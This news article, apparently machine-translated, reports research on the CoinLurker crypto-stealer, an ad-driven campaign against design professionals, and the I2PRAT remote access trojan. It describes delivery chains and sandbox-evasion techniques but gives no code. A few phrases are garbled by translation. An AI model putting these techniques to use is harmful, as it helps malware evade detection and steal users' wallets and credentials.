Fake software updates are used by threat actors to deliver new stealing malware called CoinLurker.
“Written in Go, CoinLurker uses advanced obfuscation and anti-analysis techniques, making it a very effective tool in today’s cyberattacks,” – Morphisec researcher Nadau Lorber said in a technical report published on Monday.
Attacks use fake update alerts that use a variety of deceptive entry points, such as software update notifications on compromised WordPress sites, malicious redirects, phishing emails with links to fake update pages, fake CAPTCHA verification requestsdirect downloads from fake or infected sites, and links shared through social networks and messaging apps.
Regardless of the method used to start the infection chain, software update prompts use Microsoft Edge Webview2 to start the execution of the payload.
“Webview2’s dependence on pre-installed components and user interaction makes dynamic and sandbox analysis difficult,” Lorber said. “Sandboxes often lack Webview2 or do not repeat user actions, allowing malware to escape automatic detection.”
One of the advanced tactics adopted by these companies involves the use of a technique called EtherHidingin which compromised sites are seeded with scripts designed to access the Web3 infrastructure to retrieve the final payload from a Bitbucket repository masquerading as legitimate tools (eg “UpdateMe.exe”, “SecurityPatch.exe”). .
These executables are in turn signed with a legitimate but stolen Extended Validation (EV) certificate, thereby adding another layer of deception to the scheme and bypassing security fences. In the final step, the “multilayer injector” is used to deploy the payload to the Microsoft Edge process (“msedge.exe”).
CoinLurker also uses clever design to hide its actions and complicate analysis, including heavy obfuscation to check if a machine has already been compromised, decoding the payload directly in memory at runtime, and taking steps to obfuscate the program’s execution path with conditional checks, redundant resource assignments and iterative memory manipulation.
“This approach ensures that malware goes undetected, easily blends into legitimate system activity, and bypasses network security rules that rely on process behavior for filtering,” Morphisec noted.
Once launched, CoinLurker initiates communication with a remote server using a socket-based approach and proceeds to collect data from specific directories related to cryptocurrency wallets (namely Bitcoin, Ethereum, Ledger Live, and Exodus), Telegram, Discord, and FileZilla.
“This comprehensive scan highlights CoinLurker’s primary goal of collecting valuable cryptocurrency-related data and user credentials,” Lorber said. “Its targeting of both mainstream and obscure wallets demonstrates its versatility and adaptability, making it a significant threat to users in the cryptocurrency ecosystem.”
The development comes after a single threat actor was spotted running 10 malicious campaigns abusing Google Search ads to target graphic design professionals at least since November 13, 2024, using lures related to FreeCAD, Rhinoceros 3D, Planner 5D and Onshape.
“Domains were launched day after day, week after week, since at least November 13, 2024, for malicious ad campaigns located at two dedicated IP addresses: 185.11.61(.)243 and 185.147.124(.)110,” Silent Push said. “Sites originating from these two IP address ranges run Google Search ad campaigns, all of which lead to a lot of malicious downloads.”
It also follows the emergence of a new family of malicious programs called I2PRAT, which are abusive I2P peer-to-peer network for encrypted communication with the command and control server (C2). It should be noted that I2PRAT is also tracked by Cofense under the name I2Parcae RAT.
The starting point of attack is a phishing email that contains a link that, when clicked, takes the recipient to a fake CAPTCHA verification page that uses the ClickFix technique to trick users into copying and executing a Base64-encoded PowerShell command that is responsible for launching the bootloader, which then deploys RAT after receiving it from server C2 via TCP socket.
